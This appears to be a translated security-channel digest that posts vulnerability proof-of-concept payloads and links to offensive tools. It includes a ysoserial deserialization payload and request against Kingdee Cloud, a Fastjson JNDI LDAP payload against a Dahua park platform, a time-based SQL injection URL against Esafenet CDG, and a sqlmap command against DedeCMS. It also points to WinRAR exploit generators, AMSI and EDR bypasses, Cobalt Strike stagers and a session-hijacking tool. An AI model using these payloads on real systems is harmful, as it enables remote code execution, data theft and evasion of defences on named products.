Kingdee Cloud (金蝶云) RCE vulnerability PoC
Affected platforms:
6.x --> 6.2.1012.4
7.x --> 7.0.352.16, 7.7.0.202111
8.x --> 8.0.0.202205, 8.1.0.20221110
Generate the deserialization payload:
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip
{"ap0":"payload 数值","format":"3"}
WinRAR code execution: a very simple one-click exploitation tool
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831, WinRAR RCE before version 6.23.
Latest AMSI bypass method
DebugAmsi: another way to bypass AMSI through the Windows process debugger mechanism.
https://github.com/MzHmO/DebugAmsi
(CVE-2023-2317) Typora DOM-based cross-site scripting leading to remote code execution
Typora is a popular cross-platform Markdown editor that lets users create and edit Markdown files with live preview.
https://starlabs.sg/advisories/23/23-2317/
STAR Labs advisory summary: Product: Typora; Vendor: Typora; Severity: High; Affected Versions: Typora for Windows/Linux < 1.6.7; Tested Versions: Typora for Windows 1.5.12, Typora for Linux 1.5.10; CVE Identifier: CVE-2023-2317; CVE Description: DOM-based XSS in updater/update.html…
AWS S3 HTTP asynchronous cache poisoning PoC
Dahua (大华) Smart Park Integrated Management Platform (ipms) remote code execution vulnerability PoC
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
亿赛通 (Esafenet) CDG update.jsp SQL injection vulnerability PoC
GET http://ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:2%27--
Collected notes on Docker threats and vulnerabilities
https://github.com/Antonlovesdnb/DockerDetectionNotes
Some of my rough notes for Docker threat detection.
#freebies #tools
https://github.com/tonikelope/megabasterd
This thing can bypass the MEGA cloud drive's download limits.
Yet another unofficial (and ugly) cross-platform MEGA downloader/uploader/streaming suite.
Forwarded from another channel
A self-study guide for Pwn, from 0 to 0.1
Assembly-Language: assembly language
Reverse-Engineering: reverse engineering
PWN Tools: analysis tools
PWN: You-just-got-pwned!
Reverse Tools: analysis tools
Angr CTF and its write-ups
Link: https://pan.quark.cn/s/7a7b26010e18
Confused college student vs. future millionaire cybercrime boss
Session hijacking: a tool that hijacks user sessions by injecting malicious JavaScript code.
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
Session Hijacking Visual Exploitation.
17 methods of fileless execution (nothing written to disk).
https://github.com/RedXRanger/StageStrike
Custom Cobalt Strike stagers using different methods of thread execution and memory allocation.
PoC of the ContainYourself research presented at DEF CON 31, which abuses the Windows containers framework to bypass EDRs.
https://github.com/deepinstinct/ContainYourself
DedeCMS (织梦) SQL injection PoC
A critical vulnerability was found in DedeCMS 5.7.110. It affects unknown code in the file /uploads/tags.php: manipulation of the parameter tag_alias leads to SQL injection.
sqlmap.py -u "http://……/tags.php?QUERY_STRING=/alias/bbb*" -dbs --batch